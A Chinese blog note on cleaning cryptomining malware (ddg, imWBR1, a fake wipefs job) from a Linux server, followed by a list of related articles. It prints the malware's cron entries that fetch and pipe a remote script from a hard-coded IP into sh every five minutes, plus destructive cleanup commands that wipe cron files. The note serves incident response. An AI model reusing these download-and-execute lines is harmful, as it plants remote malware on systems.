Linux 命令

估计这两个是定时下载病毒程序的任务
# cat  /var/spool/cron/crontabs/root
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh
# rm -fr  /var/spool/cron/
# ps -aux|grep ddg
root      1565  0.0  0.3 198580  5832 ?        Sl   Mar27   0:48 /tmp/ddg.3001
root     31956  0.0  0.0 112660   976 pts/2    S+   09:40   0:00 grep --color=auto ddg
# kill -9 1565
ps -aux|grep imWBR1
root     31697  0.4  1.3 319948 25936 ?        Ssl  09:15   0:07 /tmp/imWBR1
root     31970  0.0  0.0 112660   976 pts/2    S+   09:41   0:00 grep --color=auto imWBR1
# kill -9 31697
# cd /tmp
# rm -rf imWBR1

# cat /etc/crontab
看到这个wipefs的定时任务,wipefs本来是正常的,但是top看wipefs占cpu很大,所以是挖坑伪装的
0 */6 * * * root /bin/wipefs
# echo "" > /etc/crontab

解决挖矿程序(imWBR1,ddg)步骤相关推荐

  1. 阿里云Centos 解决挖矿程序:kdevtmpfsi--服务器CPU占用高、内存占用高

    前言 互联网存在很多的漏洞,如果我们使用不当,就会别被别人利用或者是盗取信息.之前在阿里云买的服务器,自己配置了nginx,mysql,redis等服务.由于在某些时候,本地程序开发中需要使用这些服务 ...

  2. 挖矿程序的处理方式及步骤

    概述 随着币圈市场交易的活跃,币价也被日益推高. 从BTC兑美元的在线交易平台上可以看出,BTC的价格屡创新高,这与MG的2W亿脱不了干系. "重赏之下,必有勇夫",在互联网圈里也 ...

  3. 阿里云服务器被挖矿程序minerd入侵的终极解决办法[转载]

    突然发现阿里云服务器CPU很高,几乎达到100%,执行 top c 一看,吓一跳,结果如下: 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tm ...

  4. 记一次服务器被挖矿程序占用的解决过程

    公司有台做voip的服务器最近CPU总是跑满,这机器自从交给厂家搭好环境后基本就没怎么管它,于是进去查看进程,top了下(见下图) 这个叫wnTKYg的进程很诡异,已经把CPU吃光了,上网一查,原来是 ...

  5. centos6.8服务器中了挖矿程序病毒的解决方法

    阿里云提示我的centos服务器出现紧急安全事件:挖矿程序:同时也出现服务器异常登录事件. 出现这样的情况,需要根据以下的步骤去处理 第一步:修改登录的帐号密码,输入命令passwd,根据提未修改. ...

  6. 解决CentOS被wbew挖矿程序入侵的方法

    来龙去脉 昨天收到阿里云的安全邮件,主机被挖矿程序入侵 有必要了解一下挖矿,百度搜索结果 所谓"挖矿"实质上是用计算机解决一项复杂的数学问题,来保证比特币网络分布式记账系统的一致性 ...

  7. 阿里云服务器被挖矿程序minerd入侵的终极解决办法

    突然发现阿里云服务器CPU很高,几乎达到100%,执行 top c 一看,吓一跳,结果如下: 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tm ...

  8. 记一次阿里云服务器CPU长期100%发现被被种挖矿程序解决的过程(一摸一样,只是没查到怎么进来的,入侵)

    centos 7 记一次阿里云服务器被被种挖矿程序解决的过程 1.原因 偶尔发现我的服务器CPU使用率长期处于100%,就登上服务器看了一下 2.查看进程 1 [root@izwz94xp1kwkca ...

  9. 阿里云服务器挖矿程序解决流程

    阿里云服务器挖矿程序解决流程 问题表象 定位解决问题 问题表象 1.CPU满负载 进入root用户执行top命令: 2. 应用进程被杀 ./startWebLogic.sh: line 184: 23 ...

  10. 【解决阿里云服务器提示挖矿程序风险2022】

    解决阿里云服务器提示挖矿程序风险2022-10 搜索删除含system-private相关的所有文件 如图:system-private.... 2.清除定时任务 3.修改文件可执行权限 4.清除路由 ...

最新文章

  1. 纸质图书与电子图书的营销策略研究
  2. Spring Security构建Rest服务-0100-前言
  3. 修改某个用户名和密码
  4. 硬盘安装以及磁盘分区和检测(笔记本R7000)
  5. python自带ide和pycharm哪个好_排名前三的Python IDE你选择哪个?我选PyCharm
  6. 2020 年最厉害的 10 门编程语言
  7. OPC DA通讯 KEP6.4 DCOM 配置脚本
  8. python unescape函数_Python中的Unescape字符串
  9. 8Python全栈之路系列之Django Cookie 与Sessi
  10. Cannot attach the file as database 'membership'.
  11. 大数据可视化类型有哪些
  12. 2021-08-08 mysql索引
  13. Java实现分页的几种方式
  14. 吃鸡游戏计算机配置,手游吃鸡pc端吃什么配置
  15. PowerApps中应用如何显示用户详细信息
  16. 2207.16吃货联盟设计大纲和全部代码
  17. Python编程实例03——对英文文本进行分词
  18. Android十大开源框架
  19. 【转】Vmware 8.0注册码 序列号 key 注册方法
  20. 拼多多电子面单云打印接口对接 (跨境erp应用,电子面单应用)[拼多多获取电子面单,拼多多面单打印]

热门文章

  1. SQL server 2008 全代码
  2. ORACLE导出表数据-dmp文件
  3. 产品升级|10月产品捷报频传,解锁更多新成就!
  4. stm32cubeMX基于HAL库点亮LED灯教程
  5. MT6589下载工具,MT6589刷机工具
  6. kafka web页面监控KafkaOffsetMonitor
  7. Readhub客户端
  8. 开源项目推荐系列(短信网关)
  9. 小程序IOS安全区域优化:safe-area-inset-bottom
  10. 量子混沌:相互作用如何影响量子多体系统的局域化?